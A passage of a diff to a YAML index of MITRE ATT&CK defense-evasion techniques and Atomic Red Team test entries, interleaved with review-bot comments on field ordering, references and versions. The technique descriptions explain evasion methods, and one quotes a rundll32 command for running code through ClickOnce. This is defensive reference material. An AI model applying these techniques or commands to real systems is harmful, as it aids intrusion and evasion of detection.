+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests:
- name: Compile After Delivery using csc.exe
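Review bot: `x_mitre_permissions_required: User` is dropped for T1027.004 while the same field is kept for T1218.009 and T1601.001 elsewhere in this diff; confirm the upstream object actually lost the field rather than the generator omitting it for blocks it rewrites. The external references also change to `description`-before-`url` ordering and are re-sorted by `source_name`, which turns a one-sentence description change into a forty-line hunk; a stable key order in the generator would keep these diffs reviewable.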
@@ -21607,7 +21745,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -21633,12 +21771,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -21728,7 +21864,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests:
- name: Bitsadmin Download (cmd)
@@ -21911,7 +22046,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests:
- name: MSBuild Bypass Using Inline Tasks (C#)
@@ -21992,7 +22126,7 @@ defense-evasion:
name: command_prompt
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -22034,10 +22168,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -22061,18 +22194,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
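Review bot: the T1578.005 description switches from the `|-` literal block used everywhere else in this file to a double-quoted folded scalar, which now ends with a trailing space (`Cloud Regions](https://attack.mitre.org/techniques/T1535). "`) and will reflow on every regeneration. The real content change is the removal of the Azure subscription-hijacking paragraph, which matches the `'2.0'` bump in the next hunk; prefer the literal block style so the diff shows only that removed paragraph.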
@@ -22086,7 +22231,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -22098,20 +22243,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
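Review bot: the two removed references (`Microsoft Subscription Hijacking 2022`, `Microsoft Peach Sandstorm 2023`) are exactly the sources cited only in the paragraph dropped from the description above; the remaining text cites `Microsoft Cryptojacking 2023` and `Microsoft Azure Policy`, both retained, so no dangling `(Citation: ...)` is left behind.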
@@ -22120,11 +22256,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -22133,6 +22268,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -22142,6 +22278,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
@@ -22153,13 +22290,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
@@ -22204,9 +22341,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests: []
T1564.003:
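Review bot: this hunk deletes `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` that the two earlier hunks for T1562.008 re-add higher up in the same object, so the net effect is a key move, not a removal; the three hunks only make sense together, and the actual content changes for this technique are the new contributor `Arun Seelagan, CISA`, the platform consolidation to `Office Suite` and `Identity Provider`, and the `'2.1'` bump.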
@@ -22289,7 +22423,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests:
- name: Hidden Window
@@ -22351,15 +22484,138 @@ defense-evasion:
'
name: powershell
elevation_required: true
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
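Review bot: in the new T1127.002 (ClickOnce) entry the two Burke reference URLs carry Google Analytics tracking parameters (`?_gl=...&_ga=...`) that should be stripped to the bare PDF path, and the same author is recorded as `William J. Burke IV` in one entry and `William Joseph Burke III` in the other. Both new techniques (T1127.002 and T1070.010) also ship with `x_mitre_detection: ''`, so any consumer that renders detection guidance will show an empty field for them. All of this is upstream ATT&CK content, so either fix it upstream or post-process the URLs in the generator rather than hand-editing this file. The `Azure AD` to `Entra ID` rename in the T1556.009 description is a plain text change and is fine.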
@@ -22392,10 +22648,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
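Review bot: the T1556.009 platform change is not just `Azure AD` to `Identity Provider`: `SaaS` is dropped as well, leaving only `IaaS` and `Identity Provider`, so a SaaS-platform index will lose this technique; confirm the narrowing is intended upstream rather than a side effect of the platform consolidation.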
@@ -22432,40 +22687,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -22474,20 +22699,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
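Review bot: the `Mandiant M-Trends 2020` URL moves from the retired `content.fireeye.com` host to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf`, which is a genuine fix worth keeping; the rest of this block is the same key reordering seen for T1027.004, including the dropped `x_mitre_permissions_required: User`, with the new contributor `Arun Seelagan, CISA` and the `'1.2'` bump as the only other content changes.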
@@ -22517,7 +22772,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22560,8 +22815,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
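Review bot: removing both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1055.009 leaves the object with no ATT&CK spec version at all, whereas the objects that are fully regenerated in this patch (T1036.010, T1556.001, T1556.005, T1070.004) end up with `x_mitre_attack_spec_version: 3.2.0`. If the intent is to retire only the STIX `spec_version` key, keep `x_mitre_attack_spec_version` (refreshed to the bundle's value) so consumers can still tell which spec an object follows; the same partial removal appears below for T1601.001, T1070.009, T1221 and T1564.005.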
@@ -22608,7 +22861,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -22674,12 +22927,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -22734,33 +22985,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
- technique:
- x_mitre_platforms:
- - Windows
+ T1036.010:
+ technique:
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
